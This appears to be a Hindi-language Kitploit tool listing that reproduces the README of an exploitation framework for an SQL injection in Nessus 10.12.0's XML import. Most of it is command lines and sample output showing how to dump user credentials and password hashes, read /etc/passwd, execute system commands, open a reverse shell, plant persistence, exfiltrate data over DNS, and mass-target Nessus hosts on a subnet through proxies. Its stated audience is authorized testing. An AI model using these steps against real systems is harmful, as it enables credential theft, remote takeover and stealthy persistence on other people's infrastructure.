Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — CVE-2026-57588 के लिए PoC - Nessus 10.12.0 XML आयात में SQL इंजेक्शन। डेटाबेस गिनने, क्रेडेंशियल एक्सफिल्ट्रेट करने और समय-आधारित ब्लाइंड इंजेक्शन का परीक्षण करने के लिए दुर्भावनापूर्ण .nessus फ़ाइलें उत्पन्न करता है। अधिकृत सुरक्षा अनुसंधान के लिए। लेखक: Sudeepa Wanigarathna। 10.12.1 में पैच किया गया। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
डेटाबेस सुरक्षा
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

रिपॉजिटरी देखें
111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-57588 के लिए PoC - Nessus 10.12.0 XML आयात में SQL इंजेक्शन। डेटाबेस गिनने, क्रेडेंशियल एक्सफिल्ट्रेट करने और समय-आधारित ब्लाइंड इंजेक्शन का परीक्षण करने के लिए दुर्भावनापूर्ण .nessus फ़ाइलें उत्पन्न करता है। अधिकृत सुरक्षा अनुसंधान के लिए। लेखक: Sudeepa Wanigarathna। 10.12.1 में पैच किया गया।

साझा करें

🛡️ CVE-2026-57588 - Nessus SQL इंजेक्शन एक्सप्लॉइटेशन फ्रेमवर्क

Security Research CVE Version Python License


📋 विषय सूची

  • अवलोकन
  • कमजोरी विवरण
  • विशेषताएं
  • स्थापना
  • त्वरित शुरुआत
  • उपयोग उदाहरण
पेलोड प्रकार
  • उन्नत परिदृश्य
  • रिपोर्टिंग
  • समस्या निवारण
  • सुरक्षा संबंधी विचार
  • लाइसेंस

  • 🔍 अवलोकन

    CVE-2026-57588 Tenable Nessus संस्करण 10.12.0 और पूर्व में पाई गई एक गंभीर SQL इंजेक्शन कमजोरी है। यह कमजोरी .nessus स्कैन परिणाम फ़ाइलों को आयात करते समय XML पार्सिंग तंत्र में मौजूद है, जो आयात विशेषाधिकारों वाले प्रमाणित उपयोगकर्ताओं को बैकएंड PostgreSQL डेटाबेस के विरुद्ध मनमानी SQL क्वेरी निष्पादित करने की अनुमति देती है।


    ⚠️ कमजोरी विवरण

    गुणमान
    CVE IDCVE-2026-57588
    कमजोरी प्रकारSQL इंजेक्शन
    प्रभावित उत्पादTenable Nessus 10.12.0 और पूर्व
    सुधारित संस्करणNessus 10.12.1 और बाद के
    CVSS स्कोर4.3 (मध्यम)
    हमला वेक्टरनेटवर्क
    हमला जटिलतानिम्न
    आवश्यक विशेषाधिकारप्रमाणित (आयात अनुमतियाँ)
    उपयोगकर्ता सहभागिताआवश्यक (सोशल इंजीनियरिंग)
    प्रभावडेटा चोरी, RCE

    🔬 तकनीकी विवरण

    यह कमजोरी XML टैग मानों के अपर्याप्त स्वच्छीकरण के कारण मौजूद है, जिन्हें आयात प्रक्रिया के दौरान SQL क्वेरी में शामिल किया जाता है। एक दुर्भावनापूर्ण अभिनेता XML टैग जैसे:

    • hostname
    • fqdn
    • os
    • system-type
    • mac-address
    • netbios-name

    में विशेष रूप से तैयार SQL इंजेक्शन पेलोड वाली .nessus फ़ाइल बना सकता है।

    जब कोई विशेषाधिकार प्राप्त उपयोगकर्ता दुर्भावनापूर्ण फ़ाइल आयात करता है, तो अस्वच्छीकृत मान PostgreSQL बैकएंड के विरुद्ध निष्पादित होते हैं, जिससे:

    • डेटाबेस गणना
    • डेटा चोरी
    • कमांड निष्पादन
    • फ़ाइल सिस्टम पहुँच
    • स्थायित्व स्थापना

    सक्षम होती है।


    ✨ विशेषताएं

    सुविधा सूची देखने के लिए क्लिक करें

    🎯 पेलोड प्रबंधन

    • 13+ पेलोड प्रकार उद्देश्य के अनुसार वर्गीकृत
    • टेम्पलेट-आधारित पेलोड निर्माण
    • कस्टम पेलोड निर्माण और सत्यापन
    • पैरामीटर सत्यापन और सिंटैक्स जाँच
    • SQL सिंटैक्स सत्यापन

    🚀 शोषण क्षमताएँ

    • बहु-चरणीय शोषण समानांतर निष्पादन के साथ
    • डेटाबेस पहचान और गणना
    • डेटा चोरी कस्टम तालिका/स्तंभ चयन के साथ
    • लक्ष्य प्रणाली पर कमांड निष्पादन
    • फ़ाइल सिस्टम पहुँच और पठन
    • रिवर्स शेल इंटरैक्टिव सत्र के साथ
    • स्थायित्व स्थापना तंत्र
    • समय-आधारित ब्लाइंड SQL इंजेक्शन
    • बूलियन-आधारित ब्लाइंड SQL इंजेक्शन
    • त्रुटि-आधारित SQL इंजेक्शन
    • स्टैक्ड क्वेरीज़ उन्नत शोषण के लिए
    • आउट-ऑफ-बैंड DNS चोरी

    📊 रिपोर्टिंग और लॉगिंग

    • HTML रिपोर्ट पेशेवर स्टाइलिंग के साथ
    • मार्कडाउन रिपोर्ट दस्तावेज़ीकरण के लिए
    • JSON रिपोर्ट स्वचालन के लिए
    • टेक्स्ट रिपोर्ट त्वरित समीक्षा के लिए
    • लॉग रोटेशन कई स्तरों के साथ
    • विस्तृत निष्पादन आँकड़े
    • फ़ाइल हैशिंग अखंडता सत्यापन के लिए

    🛠️ उन्नत विशेषताएं

    • समानांतर निष्पादन कॉन्फ़िगरेबल जॉब्स के साथ
    • प्रॉक्सी समर्थन गुप्त संचालन के लिए
    • SSL/TLS प्रमाणपत्र हैंडलिंग
    • XML सत्यापन और स्कीमा जाँच
    • इंटरैक्टिव मोड लाइव शोषण के लिए
    • पुनर्प्रयास तंत्र विश्वसनीयता के लिए
    • टाइमआउट कॉन्फ़िगरेशन धीमे कनेक्शन के लिए

    📦 पेशेवर उपकरण

    • सबकमांड-आधारित CLI संरचना
    • वर्बोज़ और क्वाइट मोड
    • रंगीन टर्मिनल आउटपुट
    • प्रगति संकेतक लंबे कार्यों के लिए
    • डॉकर समर्थन कंटेनरीकृत परीक्षण के लिए
    • क्रॉस-प्लेटफ़ॉर्म संगतता (Linux, Windows, macOS)

    📦 स्थापना

    🐍 पूर्वापेक्षाएँ

    • Python 3.7 या उच्चतर
    • pip (पायथन पैकेज मैनेजर)
    • Git (वैकल्पिक, क्लोनिंग के लिए)

    🔧 त्वरित स्थापना

    root@kitploit:~
    # रिपॉजिटरी क्लोन करें
    git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    
    # वर्चुअल वातावरण बनाएं और सक्रिय करें
    python3 -m venv venv
    source venv/bin/activate  # विंडोज़ पर: venv\Scripts\activate
    
    # निर्भरताएँ स्थापित करें
    pip install -r requirements.txt
    
    # स्थापना सत्यापित करें
    python3 exploit.py --version
    

    🐳 डॉकर स्थापना

    root@kitploit:~
    # डॉकर इमेज बनाएं
    docker build -t nessus-exploit .
    
    # टूल चलाएं
    docker run -it --rm nessus-exploit generate -u https://test.com -p enum
    

    📦 पैकेज स्थापना

    root@kitploit:~
    # एक पैकेज के रूप में स्थापित करें
    pip install -e .
    
    # अब कहीं से भी चलाएं
    nessus-exploit generate -u https://test.com -p enum
    

    🚀 त्वरित शुरुआत

    मूल उपयोग

    root@kitploit:~
    # एक बुनियादी गणना शोषण उत्पन्न करें
    python3 exploit.py generate -u https://test.com -p enum
    
    # उन्नत बहु-चरणीय शोषण उत्पन्न करें
    python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus
    
    # डेटाबेस से डेटा निकालें
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    

    कमांड सहायता

    root@kitploit:~
    # सामान्य सहायता दिखाएं
    python3 exploit.py --help
    
    # generate कमांड सहायता दिखाएं
    python3 exploit.py generate --help
    
    # सभी उपलब्ध पेलोड सूचीबद्ध करें
    python3 exploit.py list
    

    💡 उपयोग उदाहरण

    1. बुनियादी गणना

    root@kitploit:~
    python3 exploit.py generate -u https://test.com -p enum
    
    अपेक्षित आउटपुट
    root@kitploit:~
    [2026-07-22 10:15:23] [INFO] [*] https://test.com के विरुद्ध शोषण शुरू
    [2026-07-22 10:15:23] [INFO] [*] सत्र: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
    [2026-07-22 10:15:23] [INFO] [*] पेलोड: enum
    [2026-07-22 10:15:23] [INFO] [*] चरण निष्पादित: fingerprint
    [2026-07-22 10:15:24] [INFO] [+] उत्पन्न XML: exploit_20260722_fingerprint_101523.nessus (3847 बाइट्स)
    [2026-07-22 10:15:24] [INFO] [*] चरण निष्पादित: schema_dump
    [2026-07-22 10:15:25] [INFO] [+] उत्पन्न XML: exploit_20260722_schema_dump_101524.nessus (4213 बाइट्स)
    [2026-07-22 10:15:25] [INFO] [+] शोषण पूर्ण! अवधि: 2.15s
    
    ============================================================
    शोषण सारांश
    ============================================================
    लक्ष्य: https://test.com
    स्थिति: सफल
    अवधि: 2.15s
    उत्पन्न फ़ाइलें: 3
    उत्पन्न रिपोर्ट: 3
    ============================================================
    

    2. उन्नत बहु-चरणीय शोषण

    root@kitploit:~
    python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v
    

    3. डेटा चोरी

    root@kitploit:~
    # उपयोगकर्ता क्रेडेंशियल निकालें
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    
    # कस्टम स्तंभों के साथ निकालें
    python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status
    

    4. रिवर्स शेल

    root@kitploit:~
    # श्रोता शुरू करें और शोषण उत्पन्न करें
    python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus
    

    5. कमांड निष्पादन

    root@kitploit:~
    # बुनियादी कमांड निष्पादित करें
    python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"
    
    # जटिल कमांड निष्पादित करें
    python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"
    

    6. फ़ाइल पढ़ना

    root@kitploit:~
    # सिस्टम फ़ाइलें पढ़ें
    python3 exploit.py generate -u https://test.com -p file -f /etc/passwd
    
    # एप्लिकेशन लॉग पढ़ें
    python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log
    

    7. समय-आधारित ब्लाइंड इंजेक्शन

    root@kitploit:~
    # 5 सेकंड विलंब
    python3 exploit.py generate -u https://test.com -p sleep -s 5
    
    # भारी परीक्षण के लिए 30 सेकंड विलंब
    python3 exploit.py generate -u https://test.com -p sleep -s 30
    

    8. प्रॉक्सी समर्थन के साथ

    root@kitploit:~
    # HTTP प्रॉक्सी
    python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080
    
    # प्रमाणीकरण के साथ HTTPS प्रॉक्सी
    python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080
    

    9. समानांतर निष्पादन

    root@kitploit:~
    # 8 समानांतर कार्यों के साथ चलाएं
    python3 exploit.py generate -u https://test.com -p advanced --jobs 8
    
    # कस्टम टाइमआउट और पुनर्प्रयासों के साथ
    python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5
    

    10. वर्बोज़ और क्वाइट मोड

    root@kitploit:~
    # वर्बोज़ मोड (विस्तृत आउटपुट)
    python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log
    
    # क्वाइट मोड (न्यूनतम आउटपुट)
    python3 exploit.py generate -u https://test.com -p advanced -q
    

    📚 पेलोड प्रकार

    श्रेणी: FINGERPRINTING

    पेलोडविवरणपैरामीटर
    fingerprintडेटाबेस पहचानकोई नहीं

    श्रेणी: UNION

    पेलोडविवरणपैरामीटर
    schema_dumpडेटाबेस स्कीमा डंप करेंकोई नहीं
    data_exfilतालिका डेटा निकालेंtable, columns

    श्रेणी: TIMING

    पेलोडविवरणपैरामीटर
    time_basedसमय-आधारित ब्लाइंड इंजेक्शनdelay
    boolean_blindबूलियन-आधारित ब्लाइंडcondition, delay

    श्रेणी: FILE_ACCESS

    पेलोडविवरणपैरामीटर
    file_readसिस्टम फ़ाइलें पढ़ेंpath, offset, length

    श्रेणी: COMMAND_EXEC

    पेलोडविवरणपैरामीटर
    command_execसिस्टम कमांड निष्पादित करेंcommand

    श्रेणी: REVERSE_SHELL

    पेलोडविवरणपैरामीटर
    reverse_shellरिवर्स शेल स्थापित करेंhost, port

    श्रेणी: PERSISTENCE

    पेलोडविवरणपैरामीटर
    persistenceस्थायित्व स्थापित करेंकोई नहीं

    श्रेणी: ERROR_BASED

    पेलोडविवरणपैरामीटर
    error_basedत्रुटि-आधारित इंजेक्शनquery

    श्रेणी: STACKED

    पेलोडविवरणपैरामीटर
    stacked_queriesस्टैक्ड क्वेरीज़query

    श्रेणी: OUT_OF_BAND

    पेलोडविवरणपैरामीटर
    oob_dnsDNS चोरीhost, data

    🎯 उन्नत परिदृश्य

    परिदृश्य 1: पूर्ण समझौता वर्कफ़्लो

    root@kitploit:~
    # चरण 1: डेटाबेस की गणना करें
    python3 exploit.py generate -u https://test.com -p enum -v
    
    # चरण 2: संवेदनशील डेटा निकालें
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    
    # चरण 3: स्थायित्व स्थापित करें
    python3 exploit.py generate -u https://test.com -p persist
    
    # चरण 4: रिवर्स शेल सेट करें
    python3 exploit.py generate -u https://test.com -p shell -lp 4444
    

    परिदृश्य 2: गुप्त संचालन

    root@kitploit:~
    # प्रॉक्सी और क्वाइट मोड का उपयोग करके
    python3 exploit.py generate -u https://test.com -p advanced \
        --proxy http://127.0.0.1:8080 \
        --no-ssl-verify \
        -q \
        -o stealth_scan.nessus
    

    परिदृश्य 3: स्वचालित परीक्षण पाइपलाइन

    root@kitploit:~
    #!/bin/bash
    # auto_exploit.sh - स्वचालित शोषण स्क्रिप्ट
    
    TARGET="https://test.com"
    OUTPUT_DIR="./results_$(date +%Y%m%d_%H%M%S)"
    mkdir -p $OUTPUT_DIR
    
    # सभी पेलोड चलाएं
    for payload in enum dump shell persist; do
        echo "[*] पेलोड चल रहा है: $payload"
        python3 exploit.py generate -u $TARGET -p $payload -o "$OUTPUT_DIR/${payload}_scan.nessus" -q
    done
    
    # व्यापक रिपोर्ट उत्पन्न करें
    python3 exploit.py report -i "$OUTPUT_DIR" -o "$OUTPUT_DIR/final_report"
    

    परिदृश्य 4: एंटरप्राइज़ सुरक्षा मूल्यांकन

    root@kitploit:~
    # नेटवर्क-व्यापी मूल्यांकन
    for target in $(nmap -p 8834 --open 192.168.1.0/24 | grep "Nessus" | awk '{print $5}'); do
        echo "[*] परीक्षण: $target"
        python3 exploit.py generate -u "https://$target" -p advanced -o "scan_${target}.nessus" -q
    done
    

    परिदृश्य 5: साक्ष्य संग्रह

    root@kitploit:~
    # व्यापक साक्ष्य संग्रह करें
    python3 exploit.py generate -u https://test.com -p advanced \
        --file /etc/hosts \
        --command "systemctl status nessusd" \
        --table nessus_users \
        --columns username,password_hash,email,last_login \
        -v \
        --log-file evidence.log
    

    📊 रिपोर्टिंग

    उपलब्ध रिपोर्ट प्रारूप

    प्रारूपविवरणउपयोग
    HTMLस्टाइलिंग के साथ पेशेवर HTML रिपोर्ट--format html
    मार्कडाउनदस्तावेज़ीकरण के लिए मार्कडाउन प्रारूप--format markdown
    JSONस्वचालन के लिए JSON--format json
    टेक्स्टत्वरित समीक्षा के लिए सादा टेक्स्ट--format text

    रिपोर्ट उत्पन्न करें

    root@kitploit:~
    # सभी रिपोर्ट प्रारूप उत्पन्न करें
    python3 exploit.py report -i results.json -o report
    
    # केवल HTML रिपोर्ट उत्पन्न करें
    python3 exploit.py report -i results.json -o report.html --format html
    
    # मार्कडाउन रिपोर्ट उत्पन्न करें
    python3 exploit.py report -i results.json -o report.md --format markdown
    

    रिपोर्ट सामग्री

    • लक्ष्य जानकारी
    • सत्र ID और पेलोड प्रकार
    • निष्पादन आँकड़े
    • उत्पन्न फ़ाइलों की सूची
    • अखंडता के लिए फ़ाइल हैश
    • त्रुटि लॉग (यदि कोई हो)
    • अस्वीकरण और चेतावनी

    🔧 समस्या निवारण

    सामान्य समस्याएँ और समाधान

    समस्या 1: कनेक्शन त्रुटियाँ
    root@kitploit:~
    # त्रुटि: कनेक्शन अस्वीकृत
    # समाधान: जाँचें कि Nessus चल रहा है और पोर्ट सुलभ है
    python3 exploit.py generate -u https://test.com:8834 -p enum
    
    # त्रुटि: SSL प्रमाणपत्र सत्यापन विफल
    # समाधान: SSL सत्यापन अक्षम करें
    python3 exploit.py generate -u https://test.com -p enum --no-ssl-verify
    
    समस्या 2: XML सत्यापन त्रुटियाँ
    root@kitploit:~
    # त्रुटि: अमान्य XML संरचना
    # समाधान: XML सत्यापन अक्षम करें
    python3 exploit.py generate -u https://test.com -p enum --no-validate
    
    समस्या 3: पेलोड त्रुटियाँ
    root@kitploit:~
    # त्रुटि: आवश्यक पैरामीटर गायब
    # समाधान: पेलोड आवश्यकताएँ जाँचें
    python3 exploit.py validate -p command_exec
    
    # फिर आवश्यक पैरामीटर प्रदान करें
    python3 exploit.py generate -u https://test.com -p exec --command "whoami"
    
    समस्या 4: अनुमति अस्वीकृत
    root@kitploit:~
    # त्रुटि: फ़ाइलें नहीं लिख सकते
    # समाधान: निर्देशिका अनुमतियाँ जाँचें
    chmod 755 ./outputs/
    python3 exploit.py generate -u https://test.com -p enum -o ./outputs/scan.nessus
    
    समस्या 5: टाइमआउट मुद्दे
    root@kitploit:~
    # त्रुटि: संचालन समय समाप्त
    # समाधान: टाइमआउट बढ़ाएँ
    python3 exploit.py generate -u https://test.com -p advanced --timeout 120
    
    # या पुनर्प्रयासों का उपयोग करें
    python3 exploit.py generate -u https://test.com -p advanced --retries 5
    

    🔐 सुरक्षा संबंधी विचार

    ⚠️ महत्वपूर्ण चेतावनी

    1. कानूनी अनुपालन: केवल उन प्रणालियों पर उपयोग करें जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है
    2. डेटा सुरक्षा: निकाले गए क्रेडेंशियल और डेटा को अत्यधिक सावधानी से संभालें
    3. पृथक वातावरण: हमेशा पृथक प्रयोगशाला वातावरण में परीक्षण करें
    4. बैकअप: परीक्षण से पहले हमेशा डेटाबेस का बैकअप लें
    5. पुनर्स्थापन: परीक्षण के बाद सिस्टम को मूल स्थिति में पुनर्स्थापित करें
    6. दस्तावेज़ीकरण: अनुपालन के लिए सभी परीक्षण गतिविधियों का दस्तावेज़ीकरण करें

    ✅ सर्वोत्तम अभ्यास

    1. समर्पित परीक्षण खातों का उपयोग करें
    2. सभी कार्यों के विस्तृत लॉग रखें
    3. तृतीय पक्ष प्रणालियों का परीक्षण करते समय गुमनामी के लिए VPN/प्रॉक्सी का उपयोग करें
    4. जिम्मेदार प्रकटीकरण दिशानिर्देशों का पालन करें
    5. अपनी टीम को कमजोरी के बारे में शिक्षित करें

    📝 लाइसेंस

    यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


    🤝 योगदान

    योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।

    विकास सेटअप

    root@kitploit:~
    # रिपॉजिटरी क्लोन करें
    git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    
    # विकास निर्भरताएँ स्थापित करें
    pip install -r requirements-dev.txt
    
    # परीक्षण चलाएं
    pytest
    
    # कोड फ़ॉर्मेट करें
    black exploit.py
    
    # लिंटिंग जाँचें
    flake8 exploit.py
    

    📞 सहायता

    दस्तावेज़ीकरण

    • आधिकारिक Tenable सुरक्षा सलाह
    • CVE डेटाबेस प्रविष्टि
    • Nessus दस्तावेज़ीकरण

    संपर्क

    • लेखक: Sudeepa Wanigarathna
    • ईमेल: [email protected]
    • GitHub: CerberusMrXi

    📄 परिवर्तन लॉग

    संस्करण 1.0.0 (2026-07-22)

    प्रारंभिक रिलीज

    • ✅ व्यापक शोषण ढाँचा
    • ✅ उद्देश्य के अनुसार वर्गीकृत 13 पेलोड प्रकार
    • ✅ समानांतर निष्पादन के साथ बहु-चरणीय शोषण
    • ✅ XML सत्यापन और स्कीमा जाँच
    • ✅ कई रिपोर्ट प्रारूप (HTML, मार्कडाउन, JSON, टेक्स्ट)
    • ✅ स्वचालित फ़ाइल हैशिंग और अखंडता सत्यापन
    • ✅ रोटेशन के साथ पेशेवर लॉगिंग
    • ✅ गुप्त संचालन के लिए प्रॉक्सी समर्थन
    • ✅ इंटरैक्टिव सत्र के साथ रिवर्स शेल
    • ✅ स्थायित्व तंत्र
    • ✅ कमांड निष्पादन और फ़ाइल पढ़ना
    • ✅ समय-आधारित और बूलियन-आधारित ब्लाइंड इंजेक्शन
    • ✅ त्रुटि-आधारित और स्टैक्ड क्वेरी इंजेक्शन
    • ✅ आउट-ऑफ-बैंड DNS चोरी
    • ✅ डॉकर समर्थन
    • ✅ क्रॉस-प्लेटफ़ॉर्म संगतता

    ⬆ शीर्ष पर वापस जाएं


    ⚠️ अस्वीकरण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता।

    टूल डाउनलोड करें